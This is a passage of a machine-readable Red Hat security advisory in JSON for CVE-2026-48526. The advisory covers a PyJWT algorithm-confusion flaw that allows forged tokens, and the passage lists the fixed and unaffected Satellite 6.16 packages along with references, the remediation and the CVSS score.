"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.src"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2482734"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in PyJWT, a Python library for JSON Web Token (JWT) implementation. When decoding JWTs, the library fails to validate the use of JSON Web Keys (JWK) in the HMAC algorithm while also supporting asymmetric algorithms. This allows a remote attacker to use the issuer\u0027s public key as the secret key for the HMAC algorithm, leading to the ability to forge JWTs. This vulnerability can result in authentication bypass or unauthorized access.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "python-pyjwt: PyJWT: Authentication bypass due to forged JSON Web Tokens",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This Important vulnerability in PyJWT allows for authentication bypass and unauthorized access. It occurs when a JWT verifier is misconfigured to accept both symmetric and asymmetric algorithms, and a public JSON Web Key is erroneously used as the HMAC secret. Red Hat products are only affected if they utilize this specific, non-standard verifier configuration.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"9Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch"
],
"known_not_affected": [
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16-capsule:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16-capsule:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.src"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-48526"
},
{
"category": "external",
"summary": "RHBZ#2482734",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2482734"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-48526",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-48526"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-48526",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-48526"
},
{
"category": "external",
"summary": "https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx",
"url": "https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx"
}
],
"release_date": "2026-05-28T15:09:09.258000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T16:04:50+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor detailed instructions how to apply this update, refer to:\n\nhttps://docs.redhat.com/en/documentation/red_hat_satellite/6.16/html/updating_red_hat_satellite/index",
"product_ids": [
"8Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"9Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50223"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16-capsule:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16-capsule:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.src",
